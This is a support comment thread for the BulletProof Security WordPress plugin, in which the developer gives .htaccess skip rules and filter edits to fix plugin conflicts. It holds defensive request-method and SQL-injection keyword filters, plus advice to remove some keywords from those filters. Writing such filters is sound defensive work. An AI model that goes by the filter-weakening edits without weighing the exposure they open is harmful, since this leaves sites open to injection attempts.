Please post your questions or comments in the new BulletProof Security Forum. When posting questions please provide specific details about the exact problem that is occuring
A BPS free general troubleshooting help page can be found here → BulletProof Security Free Forum
A BPS Pro general troubleshooting help page can be found here → BulletProof Security Pro Forum
Example:
Provide the plugin name if there is an issue or problem with another plugin.
Provide your exact steps in specific detail that led to the error, issue or problem.
Provide the error message that is occurring.
BulletProof Security Version .47.5 >>> Released 10-22-2012
BulletProof Security Version .47.4 >>> Released 9-18-2012
BulletProof Security Version .47.3 >>> Released 8-12-2012
BulletProof Security Version .47.2 >>> Released 8-05-2012
BulletProof Security Version .47.1 >>> Released 5-11-2012
BulletProof Security Version .47 >>> Released 5-10-2012
BulletProof Security Version .46.9 >>> Released 3-14-2012
BulletProof Security Version .46.8 >>> Released 1-16-2012
BulletProof Security Version .46.7 >>> Released 1-04-2012
BulletProof Security Version .46.6 >>> Released 12-01-2011
BulletProof Security Version .46.5 >>> Released 11-21-2011
BulletProof Security Version .46.4 >>> Released 8-09-2011
BulletProof Security Version .46.3 >>> Released 6-09-2011
BulletProof Security Version .46.2 >>> Released 4-24-2011
BulletProof Security Version .46.1 >>> Released 4-09-2011
BulletProof Security Version .46 >>> Released 3-09-2011
BulletProof Security Version .45.9 >>> Released 2-22-2011
BulletProof Security Version .45.8 >>> Releases 1-27-2011
BulletProof Security Version .45.7 >>> Released 12-31-2010
BulletProof Security Version .45.6 >>> Released 11-1-2010
BulletProof Security Version .45.5 >>> Released 10-10-2010
BulletProof Security Version .45.3 >>> Released 9-18-2010
BulletProof Security Version .45.2 >>> Released 8-13-2010
BulletProof Security Version .45.1 >>> Released 7-24-2010
BulletProof Security Version .45 >>> Released 7-22-2010
If you dig it please create a link back to AITpro. Thank you.
Tags: BulletProof Security Comments, BulletProof Security Questions
Categories: BulletProof Security Plugin Support
Hi guys,
We webmaster Prasarnmit International Programme) and have a SMF forum linking to the main WordPress site. Once we’ve activated BPS certain admin functions of SMF – such as deleting posts or moving around the admin section of SMF – return an error similar to the following:
403 Permission Denied
You do not have permission for this request /forum/index.php?action=deletemsg;topic=30.0;msg=71;dc49bd7d54=14959cb8d9672936c668aa0683aaeda0
On our own website we’ve said BPS is a “must have” WP plugin and despite this problem still maintain that anyone who doesn’t install BPS must be smoking crack, but it would be really nice if we could find a solution to this problem.
Our testing shows that activating either Root Folder .htaccess Security Mode or wp-admin Folder .htaccess Security Mode causes this error to occur.
While we as webmasters can easily jump back and forward between the WP admin and SMF admin, our forum moderators don’t have access to WP admin.
Any suggestions?
Try this fix and let me know if it works. copy this .htaccess code to your root .htaccess file. Thanks.
# SMF DeleteMessage function Query String skip RewriteCond %{QUERY_STRING} action=deletemsg(.*) [NC] RewriteRule . - [S=30]Thanks very much for the suggestion regarding our SMF conflicting with BPS plugin problem
That worked perfect. We also had other difficulties with a 403 error message in the SMF admin area – moving to features and functions invoked a similar 403 error. I modified your suggested code to:
# SMF action=admin Query String skip RewriteCond %{QUERY_STRING} action=admin(.*) [NC] RewriteRule . - [S=30]And it fixed that problem with SMF conflicting with the BPS plugin problem also.
You guys rock!!
We haven’t had a single website we manage hacked since installing BPS – We’ll do a special write-up on BPS in the coming weeks.
Thanks very much for solving our SMF conflicting with BPS plugin problem.
Cool! Thanks. 🙂
Hi
I’ve installed Bullet Proof and got this message in red, in the “General Security File Checks” area of my Security Status:
“Your Current wp-admin .htaccess File is NOT backed up yet”
I am not particularly technically literate and don’t understand this message. Does it point to a problem that needs attention, or can I ignore it.
Really appreciate your help,
Leo Hawkins
PS I’m much impressed by what I have seen of your product so far.
Hi
This is just a heads up alert to let you know that the file is not backed up yet so you can either back it up or just ignore the alert. If an .htaccess file did not exist in your wp-admin folder then that would be a problem. Thanks.
Thanks for your rapid response.
I have two observations to further this discussion:
1] On the “BulletProof Security Status” page, in the “Activated BulletProof Security .htaccess Files” section there is this sentence: “The .htaccess file that is activated in your wp-admin folder is: XXXX [there is a file name here but I thought it best not to reproduce it on an open forum].
This suggests that the .htaccess file does exist in the wp-admin folder.
So this leads to my first question: Why has it not been backed up?
My second question is: How can I back it up?
2] On the “Edit/Upload/Download|” page, under the “File Downloads” section, there are two blue buttons: “root.htaccess backup file” and “wp-admin.htaccess backup file”
When I click on these blue buttons all that comes is a 404 Error webpage.
My third question: Should I see the 404 page, or is something wrong?
many thanks for your help,
Leo
Yep you have an existing .htaccess file in your /wp-admin folder. Backup and Restore of the .htaccess files is done on the Backup & Restore page. Under Backup Your Currently Active .htaccess Files — Select the Backup htaccess files radio button and click the Backup Files button. The buttons your mentioned on the Edit \ Upload \ Download page are for downloading those files and you saw a 404 error message because you must enable downloading first. This is going to change in the next release of BPS and i may just decide to get rid of all the dumb download stuff in there anyway. it was a very old idea that has long since become archaic and useless. 😉 Thanks.
Many thanks – all sorted now.
Actually I did what you suggested first time around [the radio button for .htaccess] but seems it needed a second poke to get it to work fully.
have a great day,
Leo
Ed – a quick question:
currently I use wordpress-firewall-2 plugin on my website. I am not an wp/coding expert by any stretch, but I wondered if that was not quite enough of a protection, so in my search for extra WP security I came across your plugin.
If I were to use your paid Pro version, should it be in addition to firewall-2 or instead of?
Thanks!
Well that plugin has not been updated in about a year so maybe it has been abandoned? I took a look at it many months ago and i believe it does a couple of things that BPS (free version) doesn’t do like logging bad behavior, but as far as security protection goes BPS (free version) is overriding this plugin’s security capabilities and does quite a bit more. The first release of BPS Pro is primarily covering all the basics of website security with some advanced tools. So honestly you really can’t compare firewall 2 to BPS Pro. It would be like comparing a shoe to a shoe factory. 😉 Lots more to come in future releases of BPS Pro too, but i had to get something out the door just to get started. BPS Pro is a few months worth of coding work and a very solid foundation to build from. I am really excited about what is coming in future versions and believe this will put BPS Pro in a league all by itself. 😉 Thanks.
I just purchased the BulletProof Security Pro Plugin, and was impressed when Ed offered to set it up for me. This led to a minor installation snafu due to unexpected issues on my server, which Ed resolved within a few hours. I just want to publicly thank Ed for what I consider customer service above and beyond the norm. I’m also very happy with the plugin, and will be educating myself as to how it functions over the next few weeks. For small business owners like myself the BPS Pro plugin seems essential to my working sites, because we all know it is far better to be safe than to clean up after a site has been hacked. I encourage anyone on the fence about the purchase of the Pro plugin, to take the jump. Because we pay not only for a good product with great coding, but also for the customer support that lies beneath it. Great job this morning, Ed. Thank you very much for all your work.
Hi,
Thanks for the awesome kudos!
And thanks again for letting me spend so much extra time exploring, gathering and documenting the new information about what your web host is now offering in regards to php.ini.
Best Regards,
Ed
Hi,
We tried to add a subdomain to our site.When we viewed the main site it showed 500 internal server error.I googled for help,as well as emailed our host.Up until this comment the only thing I have found was renaming the .htaccess file.I tried,but do not know if it was correct.We can’t login to our blog.Is there something we can do from c/panel to get our blog back up.I can find the bps backup folder in c/panel, but don;t know what to do with it.We are not “code'” savvy but i can find my way around c/panel’s file manager.Thanks for any help.
NaTrna
Ok so i am going to assume that you installed BPS, created a custom permalink structure under WordPress Permalinks and then activated BulletProof Modes. To get into your main site you will need to download and use the default.htaccess file to get back into your WordPress Dashboard. You can download it from this folder /wp-content/plugins/bulletproof-security/admin/htaccess. Once you have downloaded the default.htaccess file then upload it to your root folder (the same folder that the wp-config.php file is in for your main site) for your main site and rename the file to .htaccess (removing default from default.htaccess). You should now be able to log into your WP Dashboard. Thanks.
Hi and thank you for the great plugin.
I found out that when I enable the BPS .htaccess main file it prevents me from using certain pages of phpMyAdmin. Browsing the tables is fine. Using pages like tbl_change.php or sql.php is not working anymore. The installation of PMA, not the plugin, the full version, is under a subdir and WP runs from the root dir of the website.
Hope you can help me.
Thanks in advance.
Wierd. I use phpMyAdmin on a daily basis and also a plugin that connects to the MySQL database from within the WP Dashboard and i have never had an issue or problem. I can’t think of how BPS would have anything to do with phpMyAdmin. “PMA….is under a sub directory…” Is this for a development site that you have on your local system / computer. ie XAMPP? This is the only logical thing i can think of where BPS could possibly be causing some kind of an issue. Honestly i can’t really think of how there would be an issue even on a local XAMPP set up either. Can you give me some more details? Also I see Amazon has a number of different DB options. I am not familiar with them at all so be a specific as possible about what type of DB setup you have with them if the issue is with a live or production site on their servers. Thanks.
PS cool site! I have not done anything with DAZ in a long, long time. 😉
Thanks!
The site is running ubuntu with MySql, the version of PMA is the latest, 3.4.3.2. I tested the condition step by step.
– No BPS, PMA works
– Enable just the master .htaccess, PMA doesn’t work
– Revert back to my original .htaccess, PMA works again.
The behavior is for the http://www.preta3d.com site, it’s not a local configuration, that’s the live, Apache-managed site.
Hope this helps.
Ok well i can’t seem to recreate the problem on my sites and host server so I’m not exactly sure what to tell you here. PMA works fine on my host when testing tbl_change.php and sql.php. You could try and comment out the Query String filters one by one in the BPS root .htaccess file to find out which filter is blocking what is seen as a threat or hacking attempt. Overall this is an area of the .htaccess master file that i would not consider changing as a regular modification that i would distribute in a future version of BPS so if you need to customize the .htaccess file filters for your specific needs then just try and commenting out approach. Keep in mind that each filter you remove will open up another possible vulnerability on your website. 😉 Another approach could be to create a custom htaccess skip rule for your site needs. Take a look at the skip rules in the root .htaccess file and maybe one of those methods will work for your needs. You would have to create a new skip rule based on your specific variables, uri, condition, query string, etc.
I came across this info in a Google search and this is the direction you should be looking at to correct the issue for your specific site. this is explaining how you would do fix this issue at the Master httpd.conf level so if you wanted to do this at the .htaccess level then the same general idea would apply. you basically want to turn off / not include / skip the root htaccess security filters from being applied to ONLY the /phpadmin folder.
“I suddenly got this error when trying to edit a table record using phpMyAdmin. (the path of the root of your Apache directory tree):
To fix this, add this to your /etc/httpd/conf/httpd.conf, inside the block that starts with
SecRuleEngine off
Alternatively, you can write a separate entry only for the directory where you have installed your phpMyAdmin (/var/www/html/phpadmin in my case, but probably different for you):
Directory “/var/www/html/phpadmin”>
SecRuleEngine off
Directory>
Then restart Apache (/etc/init.d/httpd restart) and all should be ok. ”
The above information in quotes was found by googling.
Thanks.
Thank you very much for the quick and detailed answer. I added a skip rule for the path where PMA is installed and everything works perfectly.
Fantastic products and fantastic support!
Thanks a million.
Excellent and Well Done!!! It’s always a pleasure to be working with a technically savvy person. 🙂 Thank you and ur welcome.
Thanks for great plugin. Am using it on several sites and have all options/modes running. Have green indicators that everything is working as it should. My question is, when I use ismyblogworking.com and check my sites that have BPS installed, it returns errors that HTTP HEAD REQUESTS are not enabled or something like that.
Is this a result of BPS settings in my htaccess files? Is it “bad” and do I need to fix or modify the BPS created .htaccess files to enable them?
Thanks for the help.
Chris
ha ha ha. Yeah i checked my site and it says “Your blog is broken”. LOL Really that’s funny I’m logged into my blog right now. LOL The “error” is “Your blog doesn’t support HTTP HEAD requests (403).”. Exactly what i want thank you very much. 🙂 If you would like to allow HEAD requests to your site(s). Then just remove the HEAD request from:
# FILTER REQUEST METHODS RewriteCond %{REQUEST_METHOD} ^(HEAD|TRACE|DELETE|TRACK) [NC] RewriteRule ^(.*)$ - [F,L]“The HEAD method is identical to GET except that the server MUST NOT return a message-body in the response. The metainformation contained in the HTTP headers in response to a HEAD request SHOULD be identical to the information sent in response to a GET request. This method can be used for obtaining metainformation about the entity implied by the request without transferring the entity-body itself. This method is often used for testing hypertext links for validity, accessibility, and recent modification.”
Well that sounds like something you would want to have allowed right?
Yep HEAD is Forbidden in the Root .htaccess file. It is more of just a nuisance blocker then anything else.
It does not really serve a security purpose. Just filters out cloaked crap bots, crap harvesters, crap spiders, etc. traffic.
This does not necessarily do anything to stop them. It is more of an F YOU to these automated crap crawlers! LOL
Bottom Line >>> The server understands the request, but is refusing to fulfill it.
Thanks,
Ed
Good to hear and thanks for the reply. I’m going to just leave it as is since that sounds like good advice to avoid the crap crawlers as you say! You have any suggestions for better online tools to check websites with instead of the one I found? Was looking around, but most are pretty basic.
thanks again,
Chris
That site checker seemed pretty good, but to be honest with you I do all of that stuff manually. So nope I don’t know of any other good site checkers. Sorry. Thanks.
I am testing out your plugin and have a problem with the plugin Visitor Maps and Who’s Online by Mike Challis it stops showing the map images behind the pins of where people are. I believe it is a simple fix but don’t know the htaccess file well enough to say allow something in this or that directory.
ok try adding an .htaccess skip rule to your root .htaccess file. Let me know if this takes care of it. Thanks.
# Visitor Maps and Who's Online RewriteCond %{REQUEST_URI} ^/wp-content/plugins/visitor-maps/ [NC] RewriteRule . - [S=30]I tried that and as soon as I make bullet proof active there is no background images.
I do not know if this is related but the server log shows
[Thu Aug 18 08:59:57 2011] [warn] RewriteCond: NoCase option for non-regex pattern ‘-f’ is not supported and will be ignored.
Is your WordPress site a root site or a subfolder site? Usually this non-regex error is due to having [NC] added after -f , which is not valid, but it could be another problem with your .htaccess coding. I will install and test this plugin and then post the fix back here. Thanks.
*** UPDATE >>> FIX FOR Visitor Maps and Who’s Online by Mike Challis ***
Remove “set” from your SQL Injection filter in your Root .htaccess file as shown below. In the do wo_map= query string, one of the variables is “offset” This is being interpreted as an external query threat, but is obviously not. Removing “set” from the filtered / blocked SQL filtered commands / words is fine and will not leave your site any less secure.
RewriteCond %{QUERY_STRING} ^.*(execute|exec|sp_executesql|request|select|insert|union|declare|drop|delete|create|alter|update|order|char|cast|convert|meta|script|truncate).* [NC]That worked fine. Thanks… I will keep playing now 🙂
Good Morning MST,
I Have been using BPS for about 4 months. First two months everything was smooth running. Then I transferred to a new hosting company. They transferred all of my cpanel accounts for me. I changed passwords to everything. Within 2 weeks after transferr I lost both sites to something called “silence is golden” but all of my data files were deleted, including my backup files for everything. I asked my new host for a backup and they refused to give it to me. I put 8 months into my blogs only to lose everything in an instant. I am building my own servers and will host my own websites from hear on out.
I do not have BPS PRO installed, would that have prevented this attack?
What can you recommend that I do to secure my servers from these kinds of attacks?
I am considering using cpanel on my new servers, is cpanel part of the problem?
Did my new hosting company do this to me?
I really love BPS and will be upgrading to PRO after I move to my own servers. And I really, really appreciate all of the hard work and time into BPS. It is clearly the best supported security solution on the internet to date!
Thank-You for Your Time and Consideration,
Rick Troup
Customer for Life!
Hello Rick,
Silence is golden is a term that WordPress uses. If you open the /wp-content/index.php you will see that phrase in that file. What may have happened is that your MySQL databases were not set up correctly or you were not able to connect to your MySQL database after the migration to the new web host. You should double check with both your old host and new host to see if you have an existing database somewhere — it will contain all of your data. Also i hate to say this after the fact, but you should also have your own backup disaster recovery plan in place. I recommend using Xcloner. It will back up all of your files and your database and zip it for you to download to your computer.
I don’t think that this was a hack at all and maybe you can still recover your data from a database that exists somewhere hopefully. Did you make a copy of it? MySQL dump, etc? Did your new host make a copy / dump of your old database? Does your old host still have a copy of your database? Check into all these possibilities before giving up.
cpanel is secure as long as it is set up correctly and secured correctly just like anything else regarding website security. 😉
Thanks,
Ed
Hi Ed,
Hope your day is going well.
You are right about backups, I have learned a very hard lesson and have been spanked hard for it. I just ran Exploit Scanner on my last WP site and there were 110 Level Severe Malware code on my website. Moderate Level 582. Every Plugin, except BPS, had malware in it. For the last eight months I had put together 36 websites, scripts and programs purchased online and WP sites. I have 1 WP website left and it is riddled with malware. Eight Months of Hard work, gone in a matter of weeks.
Backups would also have this malware in it, how do I remove this malware from the backup file I have for my last WP site? I really appreciate your help and suggestions, it is a breath of fresh air.
Why does WP.org allow so many plugins with malicious code?
Thanks for your great security package and all of your help.
Thank-You for Your Time and Consideration,
Rick Troup
Well just because Exploit Scanner is reporting things as possibly bad does not mean that they are really bad. I like Exploit Scanner a lot, but to be honest with you if someone is not fairly experienced with being able to distinguish good code from bad code then Exploit Scanner will just freak a non-coder out. What Exploit Scanner is designed to do is look at all coding that could possibly be bad that you should then look into further. It does not tell you what is actually good or bad. That would be either very difficult to do or impossible to do. The reason for this is code is code. It is the same whether it is used for good purposes or bad purposes. A good analogy is that a gun in the hands of a good person is a good thing, but a gun in the hands of a bad person is going to be a bad thing. The gun is just a gun. So when Exploit Scanner is telling you that it found code that is possibly bad you will then need to be able to look at the code and see what it it is doing. Is it doing something good or is it doing something bad?
A lot of plugins use php functions such as base64_decode for legitimate reasons. The php base64_decode function is very commonly used by hackers to decode code that are trying to hide from being searchable. Just because a plugin is using this standard php function does not mean that it is doing something bad. You have to look at what the code is doing and then determine if it is doing something good or doing something bad.
Thanks,
Ed
hello
I installed your Bullet Proof Security wordpress plugin and is fantastic
Can your plugin or the settings in the plugin affect Google Analytics data measurement?
My google analytics has stopped measuring data
I look forward to your reply
Thank you
Regards
Mike
hi Mike,
Glad you’re diggin it. 😉 Nope BPS should not affect Google Analytics in any way. Are you talking about a GA plugin by any chance? BPS could be blocking a GA plugin so let me know if this is the issue. One thing that possibly could have affected your traffic would be if you changed your custom permalink structure, but WordPress should handle this URL rewrite seamlessly so I doubt that would be the cause for a significant traffic drop, but you should create a Google Webmaster account, if you don’t have one already, and check if you have a high amount of 404 errors or any other errors going on.
Thanks,
Ed
Hi,
I’m not a tech person, and have been using BulletProof Security in different environments with no problems. However, we’ve recently changed our site to another host and started having problems: we can’t login to WP, and receive a blank page after that (we don’t have Secure WordPress, and the same version of the site still works on our previous host).
I’m guessing if BulletProof Security may have something to do with this issue, as the new host runs LiteSpeed and Percona.
What do you think?
Thanks,
Carlos
Gonna go over some basic checks first. If you have already done all this stuff then disregard it. I assume you did a migration of WordPress to your new host correct? WordPress has a post somewhere in the Codex that has step by step instructions on this if not. Or possibly you have installed a new WP site and DB and imported your MySQL database data from the old host to the new database. So assuming you have done the migration or import then have you checked to make sure your wp-config.php file has the correct DB HOST name, USER name, DB Password, etc? So if all of that stuff is good then the next thing to check would be to manually look at the .htaccess files to make sure the RewriteBase and RewriteRule are correct for this site. Download the .htaccess file that is in the root of your migrated site and make sure that the RewriteBase and RewriteRule are correct. I don’t think there would be any problems using .htaccess with LS and Perc . Thanks.
started a new comment thread since i couldn’t reply to your last comment (too many nested comments i’m guessing)
…
Ed said…
“Blame? I hope you didn’t think i was making you wrong about the WP set up you are using. ”
no! not at all! i just have a habit of not making things clear enough, so it was me i blamed 🙂
so right now WP is in home/usr/public_html/wp
ideally what i want to do is have WP in home/usr/public_html – solves the problems with having 2 htaccess files, being able to use BPS AM mode and BPS complaining that the rules for WPTC are missing, which they aren’t – they’re just not in the htaccess BPS expects
i have other directories i need WP to ignore, so i guess i would have to dump these in a sub-domain, like home/usr/public_html2 ??? is that ok to do that? seemed to work ok in testing
so now i’d have “12bytes.org” which points to /public_html and “files.12bytes.org” which points to /public_html2 or /files or whatever
the WP plugin i’m using to monitor downloads would need to monitor a directory on the sub-domain, which it can’t, so i can either hack it (not likely since my php skills suck) or dump it and replace it with a non-WP related script (more likely)
so i guess what i’m asking is… does this sound like the best way to handle my situation?
Yep I agree that if you should migrate your site to the root. This is really quick and simple to do as you probably already know and yeah it makes everything now and in the future much less complex to deal with. Simpler is pretty much always better. 😉 WP has a good post about this on their site and i seem to remember that moving the files from a CP File Manager made the whole migration take about 10 minutes. So what is puzzling to me is why is WP seeing these other directories that you want to have ignored? WP is a self contained web app and it is designed to look for only folders and files that are part of WP. So if you had folder names or file names that WP looks at or into then yeah i can see that they could conflict somehow. Ideally your structure should have all individual sites in their own folders with the exception of your root site. /site1, /site2, /site3 and the same would apply with having other platforms like if you have a forum app or ecommerce store app. /forum, /store. so yep looking at what you posted then you would create a separate folder called /files. or you could even name it /files.12bytes.org that is entirely up to you. What i am wondering is if you are doing an DNS stuff in your CP. I have found that this is also problematic so i like to stick to doing this in the actual folder structure and not doing anything in the CP with DNS. So i am assuming that the site called files.12buytes.org is actually a separate / additional installation of WordPress correct? If not, then i’m not entirely sure what you are doing with that.
I’m still really perplexed that the dowload monitoring plugin cannot monitor anything or anywhere you want it to be monitoring downloads. That would be terrible coding work if it was hard coded to not allow you to choose / specify the location to monitor. Are you absolutely sure you cannot choose / specify a location to monitor downloads? If it does not have this option you can just add it yourself and this would not require any advanced PHP expertise. You would just look at the coding of the plugin. find out where the location is set to monitor and then use that variable or function in a form you create or add onto an existing form that the plugin already has. I do this all the time with WP plugins that i’m using. If i want more options i just add them. So basically your form field would just be an input field that was blank so that you could enter the location you want in the form field. Hopefully this plugin is using the WordPress Settings API to save options to the database. Then you just need to add another option for this form field to be saved to your DB. If this plugin is not using the WP Settings API then this could be a pain in the ass thing that you wont want to bother with. What is the name of the download monitoring plugin? I’ll take a look at it and tell you what your options are. Thanks.
thanks for the detailed reply Ed – here’s my followup…
“So what is puzzling to me is why is WP seeing these other directories that you want to have ignored?”
when i had WP in the public_html root, i also had other folders there. my site is a software site and i used these other folders to store my downloads and other files related to them, so this is their only relationship to WP (it’s not a 2nd WP install). i was running into very strange issues where i was unable to download the files if a folder in the directory structure for the file name had certain characters in the name, or an underscore (and i’m talking alphanumeric chars – nothing strange)
i did a bunch of searching about this and found out it’s apparently a known issue – WP seems to “see” these foreign directories and it can cause problems – at least this is my impression from my research
the downloads are handled via the WP plug ‘WordPress Download Monitor’ (http://wordpress.org/extend/plugins/download-monitor/) and i have it configured to redirect the actual path to a friendly path in htaccess…
RewriteRule ^dlfiles/([^/]+)$ http://12bytes.org/wp/wp-content/plugins/download-monitor/download.php?id=$1 [L]
the actual path is public_html/soft/apps/[3 letter app name]/[file name]
the WP path is public_html/wp
i tried the other day to create a sub domain – files.12bytes.org – in a second public_html dir (public_html2) and, as a test, i put a file in there and tried to set the path in the download plug and, upon saving it, it strips the sub-domain, reverting back to 12bytes.org
i’m not doing anything in cPanel with DNS, though i am using the CloudFlare CDN and i set the DNS server at Dynadot.
so i think what i’ll do at this point is try another download monitor plugin, re-add the sub-domain and test again. maybe i did something wrong when i created the sub since i really don’t know what i’m doing. i didn’t add any redirects or anything – just created the domain and tried to use it. my browser could read a text file in the sub-domain, so i figured it was good to go.
Well it looks like your on top of it. I looked around at download monitoring plugins and i looked at this plugin specifically figuring that this was the plugin you were using. It looks like there are a fair amount of problems / issues going on with this plugin, but overall it looks pretty good. Probably just needs some extra coding work to customize it for your site then. hmm second public_html2 directory? Never heard of that. Maybe that is what is going wrong here. There is only one root directory for each hosting account and in your case it is named public_html. So if you wanted a subdomain site all you would have to do is create a folder called /files.12bytes.org in your root public_html folder. But then normally you would actually do another installation of WordPress in this folder because this would be another completely separate site. Then you would just add the the Site URL as files.12bytes.org in the WordPress General Settings page for this subdomain site. It only takes 1 hour to install a new WordPress site, configure it and install all your plugins so maybe you should just go this easy route and make your life a whole lot simpler. You can reuse you exact same theme in the new site so they would be completely seamless and let’s say all you were really using the new site for was downloading then you would just make it appear like it is just a designated download page when in fact it is a separate site. This could also allow you to make it much more secure then your main site if you want to make downloading much more secure. Sometimes doing this method is better. I’m actually doing something pretty much like that on my sites. I have 2 separate sites that look almost identical and that share a common DHTML menu for my purposes and i have a lot of extra security coding written all over the place for my main site because it is handling the sensitive stuff where my blog is just an explosion of words. LOL Any way it may seem like this will mean more work for you, but you know how quick it is to put together a new site and like i said if it is only serving one purpose to handle downloads right now … then you can always add more stuff to it later, but this should solve all your problems. If the download monitor software is installed on this site and all your downloads are actually stored on this site then it should work smooth as butter right? 😉
— WP in subfolder confusion —
hi! still haven’t figured this out even after reading relevant portions of the docs…
i have a single site installed in a sub-directory
W3TC is installed – it puts its rules in the site root .htaccess (public_html)
BPS puts its rules in /wp/.htaccess
with this config, BPS complains that W3TC is activated, but the rules are missing
my WP address is http://12bytes.org/wp
my site uri is http://12bytes.org
in BPS > System Info, my install is listed as a root installation — i don’t understand why this is…
Website Root Folder: http://12bytes.org/wp
Document Root Path: /home/thisusr/public_html
WP ABSPATH: /home/thisusr/public_html/wp/
WordPress Installation Folder: /
WordPress Installation Type: Root Folder Installation
BPS determines if your site is a Root Installation or Subfolder installation from the WP site information you have added under your WordPress General Settings. If you have done anything unusual like moving / having WordPress to it’s own folder or any of the other strange and problematic WP folder move / redirect methods then BPS will not be able see where WP is really installed. So what does your Site URL path show under General Settings? Does it show /wp in the path? BPS is seeing that /wp does not really exist in the “true” path for this site / folder. Typically when you see the W3TC error you just need to click the Redeploy link that BPS displays in the error message, but you obviously have some odd path issues going on with this site so i wonder where W3TC would add those rules too. So i need more info on why your site is being seen as a Root installation by WordPress and thus by BPS. Thanks.
before trying to troubleshoot this issue, let’s see if i can’t take a different approach…
i read some of what you told others regarding having WP in a sub-directory and how this can be problematic. the sole reason i did this is because i have other directories in / that i need WP to ignore and having those directories along with WP in / was causing weird issues.
might you know, or could you point me to information on how i can have WP completely ignore specified directories?
i would much rather have WP in root
AHA. Boy I’m getting good at spotting this issue. LOL Well really all this means is that you are going to have to do manual editing and uploading of your .htaccess files instead of using AutoMagic and activating BulletProof Modes. You just need to put .htaccess files where they need to be manually via FTP or your CP. So you just want to take the approach of forgetting about BPS automation and just do everything manually instead. If you post the details of where everything is located then i can tell you what manual editing will need to be done to the .htaccess files and where you will need to add them manually. Thanks.
i think one of us misunderstood the other…
given my less than stellar track record in this department, i think i know who’s to blame 🙂
maybe i didn’t explain well however…
i’d rather make things easy and use the BPS AM mode and stick WP back in public_html, instead of a sub dir., and have one primary htaccess. my problem though is convincing WP to ignore other directories along side it in public_html – for instance i have software that can be downloaded in public_html/soft/apps and when i had WP in pub_h before, it caused weird problems with these other directories.
i tried setting up a subdomain to put these other dir’s in, but that idea was a failure as well because the WP plugin i use to track downloads apparently doesn’t want to deal with a subdomain
Blame? I hope you didn’t think i was making you wrong about the WP set up you are using. If it sounded that way then i apologize. 😉 Ok so let’s look at the best possible options then. I was actually using the “having WordPress in it’s own directory” thing many years ago and i ended up running into tons of problems so i just migrated the site to another folder. Yep WordPress in the root folder of a hosting account does not play nice sometimes with other web apps that are also in the root folder of a hosting account. So when you say subdomain I assume you are saying having a folder off of the hosting account root folder such as /public_html/some-site.com where WordPress is installed in that folder? correct? I’m not 100% sure if you are saying here that you have tried putting / migrating the WordPress site to a subfolder instead of the root of your hosting account. It appears that you are saying you’ve tried that and then you are left with the problem of the plugin that is tracking downloads will not work from a subfolder. This seems a bit odd to me. Any way in my opinion you should have your WordPress site in it’s own folder so migrating it to a folder like /public_html/some-site.com would be what I would do and then I would make the plugin that is not working work. If that took rewriting the code then I would do that. Obviously this is not going to work for non-coders, but there must be a way to make the plugin work from a subfolder with some sort of option setting in the plugin itself. It really should automatically work from a subfolder so that is the real problem that you should take care of or make work first. Personally I think you may be adding additional complications to compensate for this plugin problem so I would put things where they should be “naturally” and then tackle the isolated plugin and any other problems individually. Thanks.
Have new WP installation for a client with latest download 3.2.1 and have installed BPS plugin.
All is well when activating default mode and deleting wp-admin htaccess.
Can also actiate BP Mode for aadmin but as soon as I activate BP Mode for the site everything goes. The BPS page has no style and when I try to view the site or reaccess admin I get 500 error message. The only way to get back in is to use FTP to remove htaccess file.
Also following info showing in system info:
Server Type: Apache/1.3.41
Operating System: Linux
Multisite: Multisite is not enabled
PHP Version Check: √ Running PHP5
Any thoughts.
Wow i’m glad you added the system info. This version of Apache has reached End of Life and is no longer maintained or supported. The current stable version is 2.2 and a 2.3 Beta has been released. I have no idea if BPS will work on this outdated Apache Server software, but without even going into that 1.3.41 has known security vulnerabilities that were corrected in 1.3.42. In other words, 1.3.41 is not a secure Apache version. What i recommend is you contact the host and ask them why they are using an unsecure and outdated version of Apache. Then if you get an answer that you can work with or a good explanation for the host being years behind the times then the things to check next would be if this host allows Options in an htaccess file. Very few hosts do disallow this to be used in custom .htaccess files and it will cause 500 errors. The CSS style issue is probably just related somehow to the bigger problem. Comment out Options -Indexes and make sure that the Master .htaccess files are being created with the correct RewriteBase and RewriteRule for this site when you click the AutoMagic buttons to create the Master .htaccess files. If everything looks ok at this point then Activate BulletProof Mode for the Root folder and see what happens. Thanks.
Thanks for your very quick reply, will contact the clients host and see if we can get Apache updated and then try again.
Hi, when BPS is activated, it interferes with the functioning of the Event Espresso plugin. When I’m using Event Espresso and I try to “Add An Event”, I go to that screen and click on the date selector, and I get the following error message:
403 Permission Denied
You do not have permission for this request /wp-content/plugins/advanced-events-registration/calendar_form.php?
objname=start_date&selected_day=0&selected_month=0&
selected_year=0&year_start=2011&year_end=2021&
dp=1&mon=&da1=&da2=&sna=&aut=&frm=&tar=&inp=&fmt=d-M-Y
When I turn BPS off, then the calendar control date selector appears just fine without an error message. I’ve tried using “Automagic” to generate my htaccess files hoping that it would create an exception for the Event Espresso plugin, but it doesn’t seem to do so.
Can you help me? Can you tell me how I need to modify my htaccess file to Event Espresso can work even when I have BPS turned on?
Thank you.
Hi yep this is fairly common problem with plugins that have calendars or plugins that include a custom search. What BPS is seeing as a threat is the word “selected”. This is easy enough to fix by removing the SQL filtered word / command “select” out of the SQL Injection filter in your root .htaccess file. I wish plugin authors would choose another word to use in queries instead of “select”. The words “select” and “selected” are commonly used words in forms and because they make sense people use them in queries, which is NOT necessary. If the word “chosen” was used instead then there would not be a conflict and it would not create a possible security vulnerability that could be exploited. By removing the word / SQL command “select” you are still pretty much just as protected because the SQL command SELECT would have to used in combination with some of the other filtered SQL commands in order to do damage to your site. But with the SQL command SELECT not being filtered it is possible that someone could retrieve some data from your WordPress Database. If you are storing sensitive financial data or other sensitive data that you don’t want anyone to see then make sure that it is hashed / encrypted. The SQL SELECT command is used to get data from your MySQL database so of all the SQL commands it is one of the less dangerous ones. INSERT and DELETE would obviously be a lot more dangerous to remove from your root htaccess BPS SQL Injection filter. So open your Root htaccess file in the BPS editor, scroll down to the SQL Injection filter and remove “select” from the SQL Injection filter like I have done below.
RewriteCond %{QUERY_STRING} ^.*(execute|exec|sp_executesql|request|insert|union|declare|drop|delete|create|alter|update|order|char|set|cast|convert|meta|script|truncate).* [NC]Thank you for making what I hear is a very good plugin. I am struggling to get it to find my .htaccess file though.
Sub folder install. From what I am reading, having wordpress installed in a sub folder should not be a problem.
Followed directions on this page for the install;
Giving_WordPress_Its_Own_Directory
My “root” folder is; example.com/opw/ (where wp is installed)
The “root” folder .htaccess file is in example.com/ BulletProof can’t find the .htaccess file.
System Info page
Website Root Folder: example.com/opw
Document Root Path: /home/username/example.com
WP ABSPATH: /home/username/example.com/opw/
WordPress Installation Folder: /
